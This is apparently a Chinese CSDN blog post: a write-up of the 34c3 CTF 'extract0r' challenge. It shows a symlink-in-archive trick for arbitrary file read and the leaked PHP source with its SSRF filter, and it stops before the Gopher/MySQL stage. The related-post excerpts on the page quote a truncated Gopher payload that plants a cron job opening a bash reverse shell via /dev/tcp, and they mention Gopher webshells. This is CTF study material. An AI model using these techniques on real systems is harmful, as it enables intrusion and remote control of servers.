gopher对mysql的利用_从一道CTF题目看Gopher攻击MySql

最新推荐文章于 2023-12-06 09:38:59 发布
最新推荐文章于 2023-12-06 09:38:59 发布
阅读量101 收藏
点赞数
文章标签: gopher对mysql的利用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_32394247/article/details/114500352
版权

前言

虽然比赛过程中没做出来,结束后仔细研究了一下。感觉很有意思,分享给大家。再次体会到重要的不是结果,而是研究的过程。

题目简介

34c3CTF web中的extract0r。

题中的目是一个安全解压服务,用户输入zip的url地址,程序对url进行合法性校验后会下载该zip,然后为用户创建一个目录,把文件解压进去

0×00 任意文件读取

经过测试,发现输入的域名中不能含有数字,并且压缩文件中不能含有目录,解压后的目录不解析php。通过上传一个含有符号链接文件的压缩包,可以达到任意文件读取的效果。

ln -s ../index.php test_link 7za a -t7z -r test.7z test

上传后访问test_link得到源代码

index.php (html部分已删去) 1024*10) { return "Archive's total uncompressed size exceeds 10KB"; } if ($file_cnt === 0) { return "Archive is empty"; } if ($file_cnt > 5) { return "Archive contains more than 5 files"; } return 0; } function verify_extracted($directory) { //遍历解压后的目录下的所有文件 $files = glob($directory . '/*'); $cntr = 0; foreach($files as $file) { if (!is_file($file)) { //如果不是文件就删除 $cntr++; unlink($file); @rmdir($file); } } return $cntr; } function decompress($s) { $directory = get_directory(true); $archive = tempnam("/tmp/", "archive_"); file_put_contents($archive, $s); $error = verify_archive($archive); if ($error) { unlink($archive); error($error); } shell_exec("7z e ". escapeshellarg($archive) . " -o" . escapeshellarg($directory) . " -y"); unlink($archive); return verify_extracted($directory); } function error($s) { clear_directory(); die("ERROR " . htmlspecialchars($s)); } $msg = ""; if (isset($_GET["url"])) { $page = get_contents($_GET["url"]); if (strlen($page) === 0) { error("0 bytes fetched. Looks like your file is empty."); } else { $deleted_dirs = decompress($page); $msg = "Done! Your files were extracted if you provided a valid archive."; if ($deleted_dirs > 0) { $msg .= "WARNING: we have deleted some folders from your archive for security reasons with our cyber-enabled filtering system!"; } } } ?> url.php > (32-$mask)) << (32-$mask)); } function get_port($url_parts) { if (array_key_exists("port", $url_parts)) { return $url_parts["port"]; } else if (array_key_exists("scheme", $url_parts)) { return $url_parts["scheme"] === "https" ? 443 : 80; } else { return 80; } } function clean_parts($parts) { // oranges are not welcome here $blacklisted = "/[ \x08\x09\x0a\x0b\x0c\x0d\x0e:\d]/"; if (array_key_exists("scheme", $parts)) { $parts["scheme"] = preg_replace($blacklisted, "", $parts["scheme"]); } if (array_key_exists("user", $parts)) { $parts["user"] = preg_replace($blacklisted, "", $parts["user"]); } if (array_key_exists("pass", $parts)) { $parts["pass"] = preg_replace($blacklisted, "", $parts["pass"]); } if (array_key_exists("host", $parts)) { $parts["host"] = preg_replace($blacklisted, "", $parts["host"]); } return $parts; } function rebuild_url($parts) { $url = ""; $url .= $parts["scheme"] . "://"; $url .= !empty($parts["user"]) ? $parts["user"] : ""; $url .= !empty($parts["pass"]) ? ":" . $parts["pass"] : ""; $url .= (!empty($parts["user"]) || !empty($parts["pass"])) ? "@" : ""; $url .= $parts["host"]; $url .= !empty($parts["port"]) ? ":" . (int) $parts["port"] : ""; $url .= !empty($parts["path"]) ? "/" . substr($parts["path"], 1) : ""; $url .= !empty($parts["query"]) ? "?" . $parts["query"] : ""; $url .= !empty($parts["fragment"]) ? "#" . $parts["fragment"] : ""; return $url; } function get_contents($url) { $disallowed_cidrs = [ "127.0.0.0/8", "169.254.0.0/16", "0.0.0.0/8", "10.0.0.0/8", "192.168.0.0/16", "14.0.0.0/8", "24.0.0.0/8", "172.16.0.0/12", "191.255.0.0/16", "192.0.0.0/24", "192.88.99.0/24", "255.255.255.255/32", "240.0.0.0/4", "224.0.0.0/4", "203.0.113.0/24", "198.51.100.0/24", "198.18.0.0/15", "192.0.2.0/24", "100.64.0.0/10" ]; for ($i = 0; $i < 5; $i++) { $url_parts = clean_parts(parse_url($url)); if (!$url_parts) { error("Couldn't parse your url!"); } if (!array_key_exists("scheme", $url_parts)) { error("There was no scheme in your url!"); } if (!array_key_exists("host", $url_parts)) { error("There was no host in your url!"); } $port = get_port($url_parts); $host = $url_parts["host"]; $ip = gethostbynamel($host)[0]; if (!filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4|FILTER_FLAG_NO_PRIV_RANGE|FILTER_FLAG_NO_RES_RANGE)) { error("Couldn't resolve your host '{$host}' or the resolved ip '{$ip}' is blacklisted!"); } foreach ($disallowed_cidrs as $cidr) { if (in_cidr($cidr, $ip)) { error("That IP is in a blacklisted range ({$cidr})!"); } } // all good, rebuild url now $url = rebuild_url($url_parts); $curl = curl_init(); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); curl_setopt($curl, CURLOPT_MAXREDIRS, 0); curl_setopt($curl, CURLOPT_TIMEOUT, 3); curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 3); curl_setopt($curl,CURLOPT_SAFE_UPLOAD,0); curl_setopt($curl, CURLOPT_RESOLVE, array($host . ":" . $port . ":" . $ip)); //加一条缓存,防止dns rebinding curl_setopt($curl, CURLOPT_PORT, $port); $data = curl_exec($curl); if (curl_error($curl)) { error(curl_error($curl)); } $status = curl_getinfo($curl, CURLINFO_HTTP_CODE); if ($status >= 301 and $status <= 308) { $url = curl_getinfo($curl, CURLINFO_REDIRECT_URL); } else { return $data; } } error("More than 5 redirects!"); }

李大帝
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql is fashion ctf_从一道CTF题目Gopher攻击MySql
weixin_29032337的博客
01-20 197
前言虽然比赛过程中没做出来,结束后仔细研究了一下。感觉很有意思,分享给大家。再次体会到重要的不是结果,而是研究的过程。题目简介34c3CTF web中的extract0r。题中的目是一个安全解压服务,用户输入zip的url地址,程序对url进行合法性校验后会下载该zip,然后为用户创建一个目录,把文件解压进去0x00 任意文件读取经过测试,发现输入的域名中不能含有数字,并且压缩文件中不能含有目录,...
gopher攻击mysql_机窝安全--安全技术 | 巧用Gopher协议扩展SSRF攻击手法
weixin_36001196的博客
02-23 649
SSRF(服务器端请求伪造)漏洞是一种由攻击者构造形成由服务端发起请求的一个安全漏洞,话不多说,看文章。0×01 环境搭建Centos 靶机Kali攻击机Lnmp [文中会介绍安装]Redis[文中会介绍安装]Gopherus.py [https://github.com/tarunkant/Gopherus]目标站点源码1 ...
php mysql盲注_[题目]记一次利用gopher的内网mysql盲注
weixin_42560991的博客
01-28 173
进去之后随便输账号密码登陆, 发现是个send.php在url后缀中,疑似文件包含,尝试用phpfilter发现可以任意读取,把源码down下来之后发现是个利用gopher的ssrf,题目已经提示得很明显了,利用站外location跳转到gopher协议下进行内网操作, 然后还能读到一个sql文件个conn.php,并且数据库无密码.那么应该是操作数据库了, 但是这里有两个问题,1:不知道数据库的...
gopher攻击mysql_CTFweb类型(二十七)gophermysql利用及例题讲解
weixin_42462007的博客
02-05 292
本次来讲一下gopher协议在MySQL中的利用,其实CTF题目中已经有出现过了,比如说红帽杯还有CTF都有出现过,不管是像之前讲的Redis还是MySQL,就是这种协议的利用,都是有可以做转化,现在我们讲的只是一个demo,毕竟这些协议最终它的本质其实都是对MySQL,对Redis的一个使用,但是应用能够扩展成什么类型的题目,都可以在变。先讲一下对MySQL利用:我这边创建一个demo,简单了...
gopher攻击mysql_gopher 协议在SSRF 中的一些利用
weixin_42131785的博客
02-05 1129
gopher 协议协议简介gopher 协议是一个在http 协议诞生前用来访问Internet 资源的协议可以理解为http 协议的前身或简化版,虽然很古老但现在很多库还支持gopher 协议而且gopher 协议功能很强大。它可以实现多个数据包整合发送,然后gopher 服务器将多个数据包捆绑着发送到客户端,这就是它的菜单响应。比如使用一条gopher 协议的curl 命令就能操作mysql ...
GopherServer-master_C#_Gopher_
09-29
Implementation of Gopher in C#
frog_gopher:一个用于Gopher精彩世界的服务器
05-18
FROG.TIPS GOPHER服务器 _ __,..---""-._ ';-, A GOPHER , _/_),-"` '-. `\\ IS BASICALLY \|.-"` -_) '. || A MOUSE, /` a , \ .'/ RIGHT??? '.___,__/ .-' \_ _.-'.' |\ \ \
Gopher China_2015至2019.zip
08-20
Gopher China 是中国最权威、最实力、最干货的 Go 大会,致力于为中国广大的 Gopher 提供最好的技术交流大会。 自2015年主办以来,连续4年都获得了非常好的口碑,每一年的大会从质到量都有一次新的突破。 2019年第五...
phetch::mouse_face:终端的快速lil gopher客户端
02-06
phetch::mouse_face:终端的快速lil gopher客户端
gopher-lua-libs:gopher lua的库
02-03
gopher-lua-libs 软件包包含一个用于的库。执照开发版本在github上可用,在BSD 3条款下发布。安装go get github.com/vadv/gopher-lua-libs指数 aws cloudwatch日志访问监视ssl证书厨师客户api cmd端口计算md5,字符...
gophermysql利用_gopher协议的攻击利用
weixin_32873435的博客
02-23 198
攻击内网redis攻击redis常见exp为:对应的gopher协议为:gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a*3%0d%0a$3%0d%0aset%0d%0a$1%0d%0a1%0d%0a$64%0d%0a%0d%0a%0a%0a*/1* * * * bash -i >&/dev/tcp/172.19.23.2...
CTF gopher协议
a3320315的博客
11-03 7239
0x01 例题 这儿举例安恒的一道月题 tips:利用ssrf,gopher打内网 0x02 贴出代码 <?php highlight_file(__FILE__); $x = $_GET['x']; $pos = strpos($x,"php"); if($pos){ exit("denied"); } $ch = curl_init(); curl_setopt($ch,...
gophermysql利用及例题讲解
最新发布
DKPT的博客
12-06 119
查询语句(url编码)+url编码的登入请求。
mysql 远程攻击_gopher 协议攻击内网 mysql
weixin_29480231的博客
01-19 269
本地测试一开始使用的是 centos 6.5 的虚拟机后来发现我的 curl 为 7.19.7 版本,不支持 gopher 协议但是都失败了..如果有 centos 6.5 升级 curl 版本成功的请告诉我!环境搭建失败了就只能慢慢的搭环境了,一时脑抽想体验一下 docker-compose,就去装了 dnmp(docker+nginx+mysql+php) 很棒的一个项目不过默认 php_cu...
gopher攻击mysql_[WEB安全] SSRF 利用 Gopher 协议拓展攻击面【转载】
weixin_30268555的博客
02-23 155
0x01 概述Gopher 协议可以做很多事情,特别是在 SSRF 中可以发挥很多重要的作用。利用此协议可以攻击内网的 FTP、Telnet、Redis、Memcache,也可以进行 GET、POST 请求。这无疑极大拓宽了 SSRF 的攻击面。gopher协议支持发出 GET、POST 请求:可以先截获 get 请求包和 post 请求包,再构造成符合 gopher 协议的请求。 gopher ...
SSRF漏洞理解进阶&SSRF+gopher打内网(redis、mysql、fastcgi)& SSRF相关基础概念
东隅的博客
10-25 7988
SSRF漏洞理解进阶&SSRF+gopher打内网(redis、mysql、fastcgi)& SSRF相关基础概念。首先要了解几个概念:内网&外网代理curlgopher、ftp、dict伪协议file_get_contents()、 fsockopen() 、curl_exec() 等函数。
SSRF利用 Gopher |Gopher攻击mysql及内网
crispr的博客
06-23 5106
SSRF利用 Gopher 0X01 前言 研究了一天Gopher协议的应用,实践之后决定写一下关于Gopher协议之SSRF利用的相关总结。 参考链接:https://blog.csdn.net/qq_41107295/article/details/103026470 0X02 概述 SSRF(Server-Side Request Forgery)服务端请求伪造,是一种由攻击者构造形成由...
ssrf中gopher协议的利用
V
10-29 5588
SSRF漏洞如何产生 SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击 者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF是 能够直接对目标网站的内部系统发起请求。(因为他是从内部系统访 问的,所以可以通过它攻击外网无法访问的内部系统,也就是把目标 网站当中间人) gopher协议的利用 gopher 协议 Gopher是Internet...
[ctf学习]ssrf-gopher
小飒的博客
07-05 754
?url=127.0.0.1/flag.php 看到 这里不考虑使用file直接读取 f.php内容,尝试一下如何使用gopher 进行get传值 burp拦截 取前两句 ssrf_post 还是上面情况,如果是post Content-Length: 7是post传参的长度
使用gopher协议写webshell
06-06
在某些情况下,可以利用 Gopher 协议来写 Webshell,从而实现远程命令执行和文件上传等功能。 下面是一个简单的 Gopher Webshell 例子: 1. 创建一个 PHP 脚本,将其编码为 base64 格式,假设文件名为 `shell.php`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值